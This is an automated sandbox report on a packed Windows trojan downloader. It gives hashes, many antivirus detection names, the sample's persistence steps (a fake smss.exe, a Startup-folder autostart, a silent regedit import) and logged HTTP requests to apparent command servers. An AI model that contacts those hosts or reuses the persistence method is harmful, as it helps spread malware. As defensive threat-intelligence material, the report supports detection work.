Analysis Date: 2014-11-22 05:17:10
MD5: a7ef7f874e530d7963f1597f78a6d104
SHA1: 195523b1000372e00a1056db9276a160e16ba4eb

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section CODE: md5 441f24d0349a6f1a0830a89894985424, sha1 937b647b0c788036de127b7af25659b9375703f6, size 13312
Section DATA: md5 303a210367d2fe1ce63e8acc4e729f14, sha1 52489ea9038455ab323866842544011c1bb2241e, size 512
Section BSS: md5 d41d8cd98f00b204e9800998ecf8427e, sha1 da39a3ee5e6b4b0d3255bfef95601890afd80709, size 0
Section .idata: md5 5ea90bc071e9e1fbe9464b0fd49a9503, sha1 1f80ec9ba657c6b1c49060e98a26c05beca1ff25, size 1024
Section .tls: md5 d41d8cd98f00b204e9800998ecf8427e, sha1 da39a3ee5e6b4b0d3255bfef95601890afd80709, size 0
Section .rdata: md5 70264c7928189ef43fed5ba6df6cefe0, sha1 2fbedc4b5c40b064230d92c68d3117c82184b197, size 512
Section .reloc: md5 d41d8cd98f00b204e9800998ecf8427e, sha1 da39a3ee5e6b4b0d3255bfef95601890afd80709, size 0
Section .rsrc: md5 ba5bb27faf1daee1f2fb9735f38f5a43, sha1 372d50e9160eda014b60a8b22cd15f8df8d1f2ab, size 512
Section .aspack: md5 e64e46706c851a9321a4f2986012df2e, sha1 92912fdaf1b319b400bba546eab5ab427a75baec, size 4608
Section .adata: md5 d41d8cd98f00b204e9800998ecf8427e, sha1 da39a3ee5e6b4b0d3255bfef95601890afd80709, size 0
Timestamp: 1992-06-19 22:22:17
Packer: ASPack v2.1
PEhash: 45f8ce11756b34ed9e1a5a214b0a15a907f2aa17
IMPhash: d0119413a236d23e96780b2c2a383829
AV 360 Safe: Generic.Malware.SF.67F5ECA8
AV Ad-Aware: Generic.Malware.SF.67F5ECA8
AV Alwil (avast): Trojan-gen:Win32:Trojan-gen
AV Arcabit (arcavir): Downloader.Agent.Euy
AV Authentium: W32/PWS.PVMV-8628
AV Avira (antivir): TR/Dldr.Delphi.Gen
AV BullGuard: Generic.Malware.SF.67F5ECA8
AV CA (E-Trust Ino): Win32/SillyDl.EJF
AV CAT (quickheal): TrojanDownloader.Agent.euy.na
AV ClamAV: Trojan.Downloader-16241
AV Dr. Web: Trojan.MulDrop.11401
AV Emsisoft: Generic.Malware.SF.67F5ECA8
AV Eset (nod32): Win32/TrojanDownloader.Delf.OYJ
AV Fortinet: W32/Agent.EFF!tr
AV Frisk (f-prot): W32/Pws.AHGP
AV F-Secure: Generic.Malware.SF.67F5ECA8
AV Grisoft (avg): Downloader.Agent2.AHGD
AV Ikarus: Trojan-Dropper.Agent
AV K7: Trojan ( 7000000f1 )
AV Kaspersky: Trojan-Dropper.Win32.Parsi.ly
AV MalwareBytes: no_virus
AV Mcafee: Generic.dx
AV Microsoft Security Essentials: TrojanDownloader:Win32/Tsunovest.A
AV MicroWorld (escan): Generic.Malware.SF.67F5ECA8
AV Rising: Trojan.DL.Win32.Agent.euy
AV Sophos: Troj/DwnLdr-HSK
AV Symantec: Downloader
AV Trend Micro: TROJ_FAM2f1.TOMA
AV VirusBlokAda (vba32): TrojanDropper.Parsi

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Program Files\Common Files\System\smss.exe
Creates Process: C:\Program Files\Common Files\System\smss.exe

Process
↳ C:\Program Files\Common Files\System\smss.exe

Creates File: \Device\Afd\Endpoint
Creates File: C:\Program Files\Common Files\System\start.bat
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\autostart.exe
Creates Process: REGEDIT /S "C:\Program Files\Common Files\System\start.bat"
Creates Mutex: TsunamiOverHost

Process
↳ REGEDIT /S "C:\Program Files\Common Files\System\start.bat"

Network Details:

DNS: owned.name
Type: A
204.236.239.5
DNS: dudukodu.com
Type: A
198.98.119.40
DNS: www.dudukodu.com
Type: A
HTTP GET: http://owned.name/exceptions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GET: http://www.dudukodu.com/pegasus/update.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 204.236.239.5:80
Flows TCP: 192.168.1.1:1032 ➝ 198.98.119.40:80

Raw Pcap

Strings

DVCLAL
PACKAGEINFO
.adata
advapi32.dll
.aspack
ExitProcess
GetKeyboardType
GetModuleHandleA
GetProcAddress
http://www.dudukodu.com/pegasus#
icmp.dll
IcmpSendEcho
.idata
kernel32.dll
LOADER ERROR
LoadLibraryA
MessageBoxA
oleaut32.dll
.rdata
RegQueryValueExA
.reloc
shell32.dll
SHGetSpecialFolderPathA
SysFreeString
The ordinal %u could not be located in the dynamic link library %s
The procedure entry point %s could not be located in the dynamic link library %s
This program must be run under Win32
user32.dll
VirtualAlloc
VirtualFree
WSACleanup
wsock32.dll
wsprintfA